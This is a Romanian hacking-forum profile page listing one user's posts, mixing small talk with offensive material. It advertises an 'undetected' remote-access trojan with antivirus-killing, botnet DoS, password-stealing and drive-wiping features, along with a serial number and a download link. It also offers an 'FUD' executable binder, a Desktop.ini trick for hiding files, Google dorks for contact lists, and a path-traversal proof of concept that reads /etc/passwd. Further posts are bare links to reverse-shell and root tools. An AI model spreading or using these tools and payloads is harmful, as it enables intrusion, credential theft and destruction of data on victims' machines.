Jump to content

Gonzalez

Active Members
  • Posts

    1577
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. Frumoase filme Neme! -Gonzalez
  2. Asta da om:) manelist -Gonzalez
  3. Domne fereste,saraca! Nu-mi vine sa cred la 5 ani, poate o fi vreo colorata,dar majoritatea tinerelor se insoara si fac copii la 13 ani (ma refer la rromi). In fine, trist. -Gonzalez
  4. Lasa-ti baieti ca e mai bine la scoala decat la lucru!Ar trebui sa va bucurati de ea. -Gonzalez
  5. How to run User Name: Tom Serial Number: 5233-19EB-A71C-C481 Password: ForTomAllen You will need those details when the program starts! Rat is Undetected! xD Size: 7559KB Compressed - 25.7MB Extracted Quote Exterminator technology: In the Server Builder (very useful to create codes to totally moderate the security system of the victim before installing the server). With Exterminator you can make your own XAF script files to bypass\stop\uninstall any security application in the victim system (antivirus, firewall, anti-spyware, folder protection, notifiers).Exterminator includes a very flexible scripting system with dozens of options for Professional users. • • Exterminator Actions Files (XAFs): To learn how to use the Exterminator, the examples include ones for Kaspersky, McAfee and NAV 2007 editions. • • Denial-Of-Service Attack feature: Which allows you to use your victim's systems to make attacks to internet websites remotely. This version added 1 more method. Total of 3 methods of making Botnet(s). • • Startup Bypass (SUB) option in the Server Builder: To bind the server with any of the startup items already in the victim system to totally trick the victim and startup monitors. • • Firewall Bypass (FWB) option in the Server Builder: To inject the server in any running process and/or hide the server process from task managers (including third-party programs other than Windows Task Manager), to fake the firewalls. • • Damage functions including: Format Drives, Flood Drives, Delete Kernel files, and a new Plug-In for patching BIOS (may cause very much harm). • • 7 Extra very useful third-party programs: with their licenses. • • Reverse Connection and SIN (Static-IP-Notification): To get notified of victims instantly and bypass routers and firewalls preventing server from making direct connections. • • FTP server plug-in: turn the victim system into an FTP server, and connect to it via any FTP client to ease the file transfer. • • Undetectable version of the Password Stealer plug-in: totally undetectable for anti-virus and anti-spy ware programs. Includes new features, for example BIOS password dumping and lots of new applications passwords grabbing. • • 27 Extra Skins: For the Client interface, also the skin Editor is part of the programs package. • Other Options (Besides buying the Professional version, you have other options) Download link by a premium rapidshare account: http://rapidshare.com/files/55646879/xHacker.3.ForTomAllen.rar Bafta!
  6. Grea e viata nu Black Pitbull$? Domne domne -Gonzalez
  7. 1337 EXE Binder - nu are un nume cine stie ce,dar important e : FUD ( Fully Undetected ) http://rapidshare.com/files/54289957/1337_EXE_Binder.rar.html -Bafta!
  8. La Multi Ani ! -Gonzalez
  9. dezastru )))) -Gonzalez
  10. Thought you guys might enjoy this, I've considered using it in past projects, but opted against it in the end. By: kevscode I know this is not rootkit related, but it is an very simple method of "hiding" files in user-land. You can basically cause any folder to behave exactly like the Recycle Bin, Control Panel, or other Shell Extensions. his is an old technique which exploits Microsoft's seldom used idea of customising individual folders in the Windows Shell. What you can do: Disguise any folder as: - The Recycle Bin - The Control Panel - Internet Explorer - My Computer - My Documents - Folder Settings - Start Menu settings - History - Temp Internet Files - Briefcase - Network Connections - Etc. Basically you can cause any given folder to behave as almost any buit-in Explorer Extension. How? Simply create a "Desktop.ini" file in the folder of choice and set it's CLASSID to the Extension you wish to mimic. You also need to set the folder attributes as System. Sample Desktop.ini [from c:\recycled\...] ------------ [.ShellClassInfo] CLSID={645FF040-5081-101B-9F08-00AA002F954E} ------------ Another one.... ------------ [.ShellClassInfo] CLSID= {00021401-0000-0000-C000-000000000046} ------------ This GUID turns the folder into an 'unknown' file type icon, clicking it does absolutely nothing. Right clicking only gives the created date. Check SHLGUID.H for some other common guids NOTE: Back when I was intially playing with this idea, I stumbled across a windows GUID which consistently caused Explorer to crash. Unfortunately, It's been so long ago that i don't recall the GUID. But something to look into further. There may be some vulnerabilities in there. NOTE: this "hiding" technique does not affect cmd.exe
  11. Author : ? NOTE: This procedure works on the IRC Addict Pre-Release BT2 and is expected to work on the final release, but it does not work on sidc and earlier versions For More details please visit. http://www.allhow2.com 1. Open the backtrack.iso file: Option 1. In Windows, use a program such as isobuster Option 2. In Backtrack, mount the iso (mount -o loop -t iso9660 yourcd.iso /mnt/iso) Option 3. In OSX, mount the iso ----------------------------------- 2. Copy the /boot and /BT folders from the iso to the USB flash stick ----------------------------------- Warning: the following step makes the device bootable by creating an MBR. Make sure you run this command from the USB stick, not from the mounted iso, otherwise you will corrupt your existing MBR. 3. Make the USB Stick bootable: Option 1. In Windows, cd into <path to stick>/boot, and execute the bootinst.bat. Option 2. In BackTrack or OSX, cd into <path to stick>/boot, and execute the bootinst.sh ----------------------------------- 4. The author assumes no responsibility for this procedure, especially if you don't RTFM, particularly the Warning in step 3. Annotation from an unidentified poster: If using the Backtrack Installer from the Version 2.0 Final LiveCD do the following: * use /boot as source, then select sda for creating the MBR on it and sda1_removable or the Name of your stick as Destination folder, * Make sure not to choose your HD Drive here !!! It will render your current OS Install useless !!! * After that just copy the BT Directory to the stick. * These Steps were supposed to be automatically done by the Backtrack Installer on the LiveCD Iso, unfortunately it`s broken in the Final Version, when ran from the LiveCD. Sorry. Annotation WARNING IMPORTANT: Before You say That your key is not working/booting : TRY ALL of your usb ports (front,left,back,right ALL...) Some Usb 2.0 hardware restricts Booting To different ports.. For me, the front ports were not booting, so I tried back and it worked ! After a while , I retried to boot in front usb, AND IT WAS WORKING ...??? Good Luck !
  12. Gonzalez

    hmm masina

    1-Audi -Gonzalez
  13. Scrie in google : filetype:ctt "msn" filetype:ctt "yahoo" filetype:ctt "gmail" filetype:ctt "aol" -Gonzalez
  14. vladiii : scuze pentru neacordarea de credit! Fuck off zi la mata!!! Da-ma in judecata acuma, pentru un tutorial!!! -Gonzalez
  15. Stereti-mi postu, sau da-ti-mi warn ! -Gonzalez
  16. Leecher? Vrei sa-ti postez exploituri si hacking tools private la vreme nu? ( postez si dinalea, dar nu are rost sa-mi stric reputatia ) Vezi-ti de drumul tau moubik! -Gonzalez
  17. ------------------------------------- > MuLeR Email Spider Version 1.0 < <-----------------------------------> > Feel free to do whatever the hell < < you want with this . In later > > versions ill include some more < < fucntions and better tools. ! > >-----------------------------------< HTTP:\\WTALK.ORG SIGN UP AND ENJOY! HTTP:\\PIRATEBOT.ORG SIGN UP AND RNJOY! -Greetz: Remus, Knives, K3YH0L3- http://rapidshare.com/files/47859114/MuLeR_EmailSpider.rar.html -Gonzalez
  18. http://www.routerpasswords.com/index.asp -Gonzalez
  19. http://www.viewprivateprofiles.com/index.php Bafta -Gonzalez
  20. ################################################################################# # Discovered by: GoLd_M = [Mahmood_ali] # ################################################################################# # YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability # # D0rk : inurl:"showpage.cgi?p=popsearch.html" # # 0r : inurl:"showpage.cgi?p=support.html" # # 0r : inurl:"showpage.cgi?p=dialup.html" # # 0r : inurl:"showpage.cgi?p=" # # POC: [url]http://site.com/showpage.cgi?p=../../../../../../etc/passwd[/url] # ################################################################################# # Thanx : Tryag.Com/cc , Asb-May.Net/bb , bd0rk , Cold Zero , All My Friends # #################################################################################
  21. Folosind reverse tool http://mormoroth.persiangig.com/video/Win32-ReverseShell.rar
  22. http://www.mormoroth.persiangig.com/video/getroot.rar
  23. http://dosyam.net/?id=mt738o
  24. Tut by Xoron: http://rapidshare.com/files/46504223/sql-finding-by-xoron.rar
×
×
  • Create New...